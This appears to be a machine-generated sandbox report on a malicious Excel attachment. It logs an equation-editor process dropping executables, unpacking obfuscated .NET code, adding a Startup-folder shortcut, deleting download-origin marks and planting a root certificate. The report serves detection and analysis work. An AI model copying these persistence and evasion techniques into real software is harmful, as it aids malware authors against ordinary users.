Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write

Source: Enclosed.xlsx

ReversingLabs: Detection: 29%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe C:\Users\user\AppData\Local\sys4h57g\sys30.exe
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Enclosed.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREC60.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@51/57@23/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\{6618c428-0583-4059-a498-a8ec319ccd46}

Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

.NET source code contains potential unpacker

Source: vbc[1].exe.4.dr, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.4.dr, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: sys30.exe.6.dr, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 6.0.vbc.exe.d80000.0.unpack, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 6.2.vbc.exe.d80000.1.unpack, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.sys30.exe.1220000.0.unpack, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.2.sys30.exe.1220000.3.unpack, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.2.sys30.exe.1220000.1.unpack, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00D8B27A push 00000000h; iretd	6_2_00D8B2C4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00D8CE66 push 00000000h; iretd	6_2_00D8CEB0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_0122CE66 push 00000000h; iretd	7_2_0122CEB0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_0122B27A push 00000000h; iretd	7_2_0122B2C4
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0122CE66 push 00000000h; iretd	9_2_0122CEB0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0122B27A push 00000000h; iretd	9_2_0122B2C4
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062B3E7 push edx; ret	9_2_0062B40A
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062B4D3 push ebx; ret	9_2_0062B4D6
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062B4D7 push ebx; ret	9_2_0062B4DA
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062B480 push edx; ret	9_2_0062B482
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_01020295 pushfd ; ret	9_2_01020296

Binary contains a suspicious time stamp

Source: sys30s.exe.7.dr

Static PE information: 0xC7142059 [Sun Nov 3 05:36:25 2075 UTC]

Source: vbc[1].exe.4.dr, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: vbc.exe.4.dr, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: sys30.exe.6.dr, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 6.0.vbc.exe.d80000.0.unpack, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 6.2.vbc.exe.d80000.1.unpack, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: sys30s.exe.7.dr, Astronotplart/My/tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.cs	High entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
Source: sys30s.exe.7.dr, Astronotplart/My/nVdeDLHvVsfVxwgFzORDky8W3f9u4lGmiaWnSDb.cs	High entropy of concatenated method names: '.cctor', 'ipfF6OV8JHE8Qin24Sz2H', 'GBAU51HdoykwtyLJ8j', 'A6Cmw4VPbNKHMkR6BnXqjGTCsaLYYK', 'ZhXAveIVREq8oAgNFODqxTnhx35', 'TL13XiWxESQiImm09SkPUl2iIyfqvqfNa1eW0WN', 'hXlgWtIDkKwHkCLRcj1P0yvWMryPDm997zSDv', 'crnIowWf8YVTDoRdGn'
Source: sys30s.exe.7.dr, Astronotplart/gabKErPURPS76kDKjrme.cs	High entropy of concatenated method names: '.ctor', 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
Source: sys30s.exe.7.dr, Astronotplart/My/Resources/cZsjfbJLI2Nt8If5QOa3YzSXxDXbcmzUTY.cs	High entropy of concatenated method names: '7tuLHfXnvgcErulp', 'vFPZGqKub8S44KK9njyrAe1CN2qDJ3IQa7tiGW3Oebu', 'p0Rr9tY6YlifmwQtRmfPXGEDX', 'IPf8zIYNrroPiylxpRDezmMidW58Fr8mLO'
Source: sys30s.exe.7.dr, Astronotplart/rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.cs	High entropy of concatenated method names: '.ctor', 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
Source: 7.0.sys30.exe.1220000.0.unpack, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 7.2.sys30.exe.1220000.3.unpack, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 8.2.sys30.exe.1220000.1.unpack, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File created: C:\Users\user\AppData\Local\Temp\sys30s.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Stores files to the Windows start menu directory

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys30.lnk

Jump to behavior

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys30.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\Public\vbc.exe\:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File opened: C:\Users\user\AppData\Local\sys4h57g\sys30.exe\:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File opened: C:\Users\user\AppData\Local\sys4h57g\sys30.exe:Zone.Identifier read attributes \| delete

Stores large binary data to the registry

Source: C:\Users\Public\vbc.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

